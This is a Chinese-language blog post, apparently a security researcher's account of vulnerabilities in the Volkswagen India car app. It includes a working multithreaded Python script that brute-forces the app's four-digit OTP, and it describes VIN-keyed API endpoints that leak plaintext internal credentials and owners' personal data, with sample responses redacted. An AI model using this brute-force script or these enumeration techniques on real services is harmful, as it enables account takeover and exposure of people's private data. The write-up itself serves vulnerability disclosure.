2025年5月19日14:24:55评论0 views字数 8591阅读28分38秒阅读模式

购买二手车看似简单——付钱、拿钥匙、播放你最喜欢的歌单，然后开车走人。然而，在这个万物互联的时代，“所有权”的意义远不止驾驶座。

2024年，我买了一辆二手车。作为一个科技迷，我迫不及待地想探索它的互联功能。车停好后，我立即在手机上安装了“我的大众”（ŠKODA Auto Volkswagen India Pvt Ltd）应用程序。设置过程中，它要求输入车辆识别号码（VIN）——很简单，就在挡风玻璃上。然后，它要求输入一个四位数的一次性密码（OTP）——我以为获取这个密码应该很容易。结果并非如此。

当挫折激发好奇心

OTP 被发送到了前车主的手机上。我打电话给汽车经销商，询问前车主的联系方式。虽然他提供了他们的电话号码，但我还是无法通过电话联系到他们。我发了一条短信，等了一个小时，却没有收到任何回复。

迫不及待地想要尝试一下这款应用，我尝试输入一些随机代码，看看能否成功。但什么也没成功。

即使我尝试了大约 10 到 15 次，应用程序也没有阻止我继续尝试。这激起了我的直觉：如果我暴力破解所有 10,000 种组合会怎么样？它会阻止我吗？

只有一种方法可以找到答案。

发现过程（有趣的技术部分）

距离我上次使用值得信赖的旧款Burp Suite已经有一段时间了。

配置我的 iPhone 的 Wi-Fi 代理并安装 Burp 的 CA 证书后，我使用随机 OTP 触发了一个请求，以查看它是什么样子（查看此处以获取有关如何自行操作的完整指南）。

很快，我就能检查该应用程序通过互联网发送的所有请求了。在筛选这些请求寻找我的 OTP 时，我发现了其他几个有趣的 API 调用，我将在下面讨论。

一旦我识别了请求，我就会尝试强制破解 OTP 字段，但 Burp 社区版本的速度太慢了，让我很不满意。

我编写了一个 Python 脚本，

import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

# API endpoint
url = <REDACTED>

# Headers for the request
headers = {
"Host": <REDACTED>,
"Accept": "*/*",
"Content-Type": "application/json",
"Authorization": <REDACTED>
}

# Data template
data_template = {
"brand": "VW",
"installationID": <REDACTED>,
"userID": <REDACTED>,
"vehicleID": <REDACTED>,
"otp": "5555"# OTP placeholder
}

# Function to send a single request
defsend_request(otp):
    otp_str = f"{otp:04}"# Format OTP as 4 digits
    data = data_template.copy()
    data["otp"] = otp_str

try:
        response = requests.post(url, json=data, headers=headers)
        result = f"OTP: {otp_str} | Response Code: {response.status_code} | Body: {response.text}"
except requests.exceptions.RequestException as e:
        result = f"OTP: {otp_str} | Error: {e}"
return result

# Concurrent execution
defmain():
    max_workers = 100# Number of concurrent threads
with ThreadPoolExecutor(max_workers=max_workers) as executor, open("responses.txt", "w") as file:
# Submit tasks for each OTP
        futures = {executor.submit(send_request, otp): otp for otp inrange(10000)}

for future in as_completed(futures):
            result = future.result()
# Log to console for monitoring
print(result)
# Write result to file
            file.write(result + "n")

if __name__ == "__main__":
    main()

几秒钟之内，脚本就命中了

几秒钟之内，脚本就命中了有效的 OTP，应用程序最终列出了我的车，

我终于成功访问了我的车！但这不禁让我怀疑，这个应用程序可能还存在哪些安全漏洞？我回到 Burp，检查了各种 API 调用，发现了几个严重的问题：

漏洞1：内部凭证以明文形式泄露

API 端点以明文形式公开各种内部服务的密码、令牌和用户名，其中包括内部应用程序、支付处理详细信息，甚至销售人员等 CRM 工具。

漏洞二：通过车辆识别码 (VIN) 泄露车主个人信息

另一个 API 端点仅使用 VIN 号码即可显示汽车购买的所有服务和维护包。

每个服务包条目都包含大量客户信息，包括姓名、电话号码、邮政地址、电子邮件地址、汽车详细信息（型号、颜色、注册号、底盘号、发动机号）、有效服务合同、购买日期和付款金额等。

显示可通过此端点访问的数据的示例条目：

{
"old":{
"VALID_CONTRACTS_AND_INTREM_CONTRACTS_VW":{
"CONTRACT_ID": <REDACTED>,
"PRODUCT_NAME": <REDACTED>,
"PRODUCT_DESC": <REDACTED>,
"PAYMENT_STATUS":null,
"PRODUCT_ID": <REDACTED>,
"MST_VAS_TYPE_ID": <REDACTED>,
"PLAN_ID": <REDACTED>,
"INVOICE_NUMBER": <REDACTED>,
"DEALER_ID": <REDACTED>,
"DATE_OF_SALE": <REDACTED>,
"SELLER_ID":null,
"SELLER_TYPE": <REDACTED>,
"SOLD_BY":null,
"SOLD_TYPE": <REDACTED>,
"VALID_FROM_DATE": <REDACTED>,
"VALID_TILL_DATE": <REDACTED>,
"VALID_TILL_DISTANCE":null,
"IS_OWNERSHIP_CHANGED":null,
"STATUS": <REDACTED>,
"GENERAL_COMMENTS":null,
"IS_SHORTCLOSED":null,
"SHORTCLOSED_ON":null,
"SHORTCLOSED_COMMENTS":null,
"VIN": <REDACTED>,
"ENGINE_NUMBER": <REDACTED>,
"CHASSIS_NUMBER": <REDACTED>,
"REGD_NUMBER": <REDACTED>,
"ORDER_FROM":null,
"CURRENT_KM":null,
"MODEL": <REDACTED>,
"VARIANT": <REDACTED>,
"COLOR":null,
"SHADE":null,
"PUR_CITY":null,
"REGD_CITY":null,
"REGD_OWNER": <REDACTED>,
"USER_NAME":null,
"MOBILE": <REDACTED>,
"FAX":null,
"PHONE":null,
"EMAIL": <REDACTED>,
"ADDRESS_LINE1": <REDACTED>,
"ADDRESS_LINE2":null,
"CITY": <REDACTED>,
"PINCODE": <REDACTED>,
"CREATED_ON": <REDACTED>,
"CREATED_BY": <REDACTED>,
"MODIFIED_ON": <REDACTED>,
"MODIFIED_BY": <REDACTED>,
"PARTS_MRP": <REDACTED>,
"LABOR_COST": <REDACTED>,
"SWACH_BHARAT_CESS":null,
"KRISHI_KALYAN_CESS":null,
"SERVICETAX":null,
"SWACH_BHARAT_CESS_PERCENTAGE":null,
"KRISHI_KALYAN_CESS_PERCENTAGE":null,
"SERVICETAX_PERCENTAGE":null,
"CUSTOMER_GSTIN":null,
"CUSTOMER_GSTIN_AVAILABLE":null,
"SGST": <REDACTED>,
"IGST": <REDACTED>,
"CGST": <REDACTED>,
"CESS": <REDACTED>,
"GSTIN":null,
"SGST_PERCENTAGE": <REDACTED>,
"CGST_PERCENTAGE": <REDACTED>,
"IGST_PERCENTAGE": <REDACTED>,
"CESS_PERCENTAGE": <REDACTED>,
"STATE_NUM": <REDACTED>,
"RELATED_CONTRACT_ID": <REDACTED>,
"FUEL_TYPE": <REDACTED>,
"ODOMETER_READING": <REDACTED>,
"CONTRACT_STATUS": <REDACTED>,
"CERTIFICATE_NUMBER":null,
"MODEL_CODE":null,
"SCORE":null,
"UPLOAD_FILES":null,
"CREDIT_INVOICE_NUMBER":null,
"CREDIT_CREATED_ON":null,
"MODEL_YEAR": <REDACTED>,
"BRAND": <REDACTED>,
"EW_NUMBER":null,
"TYPE_OF_CONTRACT": <REDACTED>,
"COST_BEFORE_DEALER_DISCOUNT":null,
"DEALER_DISCOUNT_TYPE":null,
"DEALER_DISCOUNT_VALUE":null,
"COST_AFTER_DEALER_DISCOUNT":null,
"IRN_NUMBER":null,
"QR_CODE":null,
"IS_IRN_CANCELLED":null,
"DISS_K_QUERY_NO":null,
"RO_NUMBER":null,
"DIAGNOSTIC_PROTOCOL_ID":null,
"DAN_NUMBER":null,
"DAN_DATE":null,
"CARPORT_FILE_GEN": <REDACTED>,
"MODE_OF_PAYMENT":null,
"PRICE":"0.00"
}
}
}

漏洞3：可通过VIN访问车辆服务历史记录

另一个端点公开了任何车辆在服务中心的所有访问期间的服务历史记录和所做工作的详细信息，同样，只需使用 VIN 号码即可访问。

每次访问车间都有一个条目，其中包括所执行的工作的详细信息、客户的个人信息，甚至每次访问的客户调查结果！

显示可通过此端点访问的数据的示例条目：

{ 
“属性” ：{ 
“类型” ： <REDACTED> ，
“url” ： <REDACTED> 
} ，
“Id” ： <REDACTED> ，
“CreatedDate” ： <REDACTED> ，
“VW_VIN__c” ： <REDACTED> ，
“VW_Registration_No__c” ： <REDACTED> ，
“RO_Closed_Date__c” ： <REDACTED> ，
“RO_Type__c” ： <REDACTED> ，
“Delivery_Date_Nadcon__c” ： <REDACTED> ，
“Mileage_Out__c” ：27670 ，
“Service_Dealer__c” ： <REDACTED> ，
“Customer_Voice__c” ： <REDACTED> ，
“Item_Amount__c” ：9898.32 ，
“Labor_Amount__c” ：3812.66 ，
“Amount__c” ：13710.98 ，
“Selling_Dealer_Code__c” ： <REDACTED> ，
“Post_Service_feedback_for_VW_HQ__c” ：false，
“VW_Brand__c” ： <REDACTED> ，
“VW_RO_Number__c” ： <REDACTED> ，
“Repair_Order__c” ： <REDACTED> ，
“SA__c” ： <REDACTED> ，
“RecordTypeId” ： <REDACTED> ，
“Service_Dealer__r” ：{ 
“attributes” ：{ 
“type” ： <REDACTED> ，
“url” ： <REDACTED> 
} ，
“Id” ： <REDACTED> ，
“Name” ： <REDACTED> 
} ，
“Repair_Order__r” ：{ 
“属性” ：{ 
“类型” ： <REDACTED> ，
“url” ： <REDACTED> 
} ，
“Id” ： <REDACTED> ，
“City__c” ： <REDACTED> 、
“Discount__c” ： <REDACTED> 、
“Discount_Amount__c” ： <REDACTED> 、
“Pincode__c” ： <REDACTED> 、
“State__c” ： <REDACTED> 、
“Total_GST__c” ： <REDACTED> ，
“address__c” ： <REDACTED> 
} 
} 
] ，
“Overall_customer_satisfaction_score” ： <REDACTED> ，
“Message” ：null，
“Dealer_PSF_Question_rated_less_than_4_star” ：{ 
“您是否需要再次访问车间，因为本次访问中的工作不正确和/或不完整。” ：否，
“您上次来维修厂是因为之前一次来访时做了不正确的工作吗？” ：“否” 
} ，
“customerMasterData” ：{ 
“attributes” ：{ 
“type” ： <REDACTED> ，
“url” ： <REDACTED> 
} ，
“Id” ： <REDACTED> ，
“VW_CustomerName__c” ： <REDACTED> ，
“VW_Primary_Email_ID__c” ： <REDACTED> ，
“VW_Address_Line_1__c” ： <REDACTED> ，
“Registered_Owner_Address__c” ： <REDACTED> ，
“VW_Active__c” ：true，
“VW_DOB__c” ： <REDACTED> ，
“VW_Permanent_Mobile_Number__c” ： <REDACTED> 
}

其他 API 端点泄露了车辆远程信息处理数据，在某些情况下甚至泄露了“学历”和“驾驶执照”号码。这表明客户数据泄露的严重程度。

来自以下某个端点的示例数据：

{
"isSuccessful":true,
"messagecode":200,
"message":"Success",
"userInfo":{
"userID": <REDACTED>,
"name": <REDACTED>,
"primaryMailID": <REDACTED>,
"secondaryMailID": <REDACTED>,
"primaryContact": <REDACTED>,
"secondaryContact": <REDACTED>,
"emergencyContact": <REDACTED>,
"familyType": <REDACTED>,
"dob": <REDACTED>,
"educationQualification": <REDACTED>,
"communicationAddress": <REDACTED>,
"otherCarDetail": <REDACTED>,
"drivingLicence": <REDACTED>,
"preferCommunicationModel": <REDACTED>
},
"loginDetails":{
"loginVia":"Email",
"otpVerifiedStatus":true
},
"notificationSettings":{
"brandVoiceAlert":false,
"serviceDueVoiceAlert":false,
"insuranceVoiceAlert":false,
"pucVoiceAlert":false,
"brandAlert":false,
"serviceDueAlert":false,
"insuranceAlert":false,
"pucAlert":false
}